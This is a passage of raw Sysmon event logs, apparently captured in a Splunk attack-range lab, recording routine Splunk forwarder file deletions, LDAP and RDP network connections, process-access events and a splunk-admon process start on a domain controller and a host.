tdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:52.456{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=296572C058FF03D742E8E0E5F187FC22,SHA256=9392F2561529B8A36021AE14B1112141E36459F8A867DA1B4AD764EB242ACDF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:52.206{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE53E072369EB732F505311D34C38784,SHA256=BCD9346D02E87518EC107D138CE27DC2445110E9A12825046B57DB7107625983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:52.190{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0726868E37315C1EFBBD972E30AF7FEE,SHA256=583D8CE857062F6A5A453DBE0EC84055B1DF784C9BAAE48BB9D0FB610E97D03B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:50.306{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49175-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000294797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:50.306{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49175-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 23542300x8000000000000000219048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:53.222{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD789C3C892FEF6B200D8F8E963421CC,SHA256=73C7DE739AA4DBDE97EE5E8A18F1B4A5FCFF0DD3E3C359A6A20EB745D018DE59,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:51.176{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49176-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:51.176{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49176-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000294807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:53.470{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09CAACA4EC8CB70CCDA30DBA6B7A2A54,SHA256=AE416BE59CD4A5458911021E03580439DADC25BE3EAE64FA6BC3A4B1A640F000,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:52.007{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49177-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:52.007{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49177-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000294810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:54.478{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C568BC68C52B7DAFD82AB517440D9F4A,SHA256=F0967CB302E557923B4520458C9CDFE84FF5A5D6B6701567EDB29F1E7CC03F0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:54.237{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8847F57FA02BAC6C3F3C535AC31B29DE,SHA256=2CF834926EC318EF2FB464A07D4008BDE1D308453E61544D83743ECC448CD809,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:55.478{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5208F5400015FD36E57EEFF787C90F3,SHA256=50151DB0CC196CB7F118B6E7C7C673D6C6EC5CFFCD0688776A453A94AA782156,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:52.686{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51495-false10.0.1.12-8000- 23542300x8000000000000000219050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:55.253{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80D104C4A03063B9701BB83EEAF07722,SHA256=A51F4936F2584B8EC8C93788EB7FE36390A928A2667E5F2855DF84F4B33BA97D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:56.494{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B1B652D2068C3059BD265685258E2D5D,SHA256=172BE58A80F58D7106333E5C43E8ACE70A97A04CF42A9A2104ECD178620ABB53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:56.494{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3BDD06081315B337B2C5E6A1676C10E3,SHA256=CC53D8A4660B87579A7F8923C7461506B732F6C2B5906E8BA195238D05BB6C5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:56.494{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FE27026EC3DDFFC583F672CC9D4F030,SHA256=AB42DEB5E74DC41B3411F0815A89527B5E92E9C9394527125D776D2F5337DC6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:56.878{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22A7532D51981543710180BE363624C4,SHA256=6C1C29CBB7AFAF9E93663FA377D75418FDD1571D7603B1997308CA9CCA3F3770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:56.268{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80D21EDB03C453C5DE1501D89E993FB9,SHA256=BD9E398E2DDDFD9ADBA97D96C6FAE97431AE1CB262BFC2171CEC739843FA6EE6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:53.381{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53354-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000294818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:57.496{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34DED2AFAE9CE31336575CE37BE10AAB,SHA256=50238091B14AA02059B4A71BFDC964D2B0019182CB5CBE4FE3A0B9DB227A03DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:55.600{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49179-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:57.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91F38577CA195EDEA98804F16F572DAA,SHA256=4702D60F19AE9DA6B05AE95178AB2E83E4E68085AFCEFACECE00C801345DFA69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:58.331{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30ACE6A32D9DE241AC06EA4229E8676A,SHA256=1F6CF7936A94637759C5416AB67255A833EE69F7A1EAE69773DC74D609265D57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:58.511{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEDFDB2BDEE89BA5C78066F27EED9095,SHA256=C29C58635EC05675766BF2C25BF1372FAA3296DBA0BFDA8EC9591D9C0C0BDB37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:59.526{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E44C0D5684896C120A53A17BAA2177DA,SHA256=015886963FADE88760534A781EE3A195817D2DE9AC76019424DD5F89FD2E7A5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:59.346{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B52B7386A143ED8BE3BB8229A8D561E9,SHA256=76524234AA3B2E881B8B4D1F86D8590A5F50CDBC51802CFCCE6BFE1616CC99B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:00.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72D2C3E4C09C0434149FE58B540A183D,SHA256=E63089B08358FF7E192AA5885072DAF47F026CB9D36FEF762F758ADAC7F33708,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:00.362{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C48B66A854656D6160DDD1EE07709C3,SHA256=9E4DD52CF6F4D65FAE4121DB3118D367ACD6B256CCCF48E3843AB7CAF2147115,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:57.787{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx62715-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000294821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:00.546{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E45CDC51F213BC772185C0C7DF75749,SHA256=0E61EEBC2D0D00AE7EA173905079ED6AD59F1CDB802C8F75101B6A1D94EFC246,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:01.518{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CB94E474ADA8115777E3BD7F65318BB,SHA256=FEA15DFBDEE7DFB6E510E3B369C6B7F73ECA44E9E4FD82282EF5B402B9124289,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:01.648{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3074154BF1E4D94D6A6A4CC434D19432,SHA256=D5D97FFDD948ADE26394134D9A191EFC86372995E8B1AB0A17965CF31A6C42CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:58.638{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51496-false10.0.1.12-8000- 10341000x8000000000000000294829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:01.494{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14A1-6216-A306-000000003802}6912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:01.494{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:01.494{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:01.494{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:01.494{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:01.494{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-14A1-6216-A306-000000003802}6912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:01.494{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14A1-6216-A306-000000003802}6912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:01.496{C8EA50B7-14A1-6216-A306-000000003802}6912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:02.715{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D7117A4840DEEC6D3F949E40EE64982,SHA256=F8253660878A1683B1A9E1DD91432B9840FC47C39D6A142B6E974843933F8C4B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:00.737{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49180-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 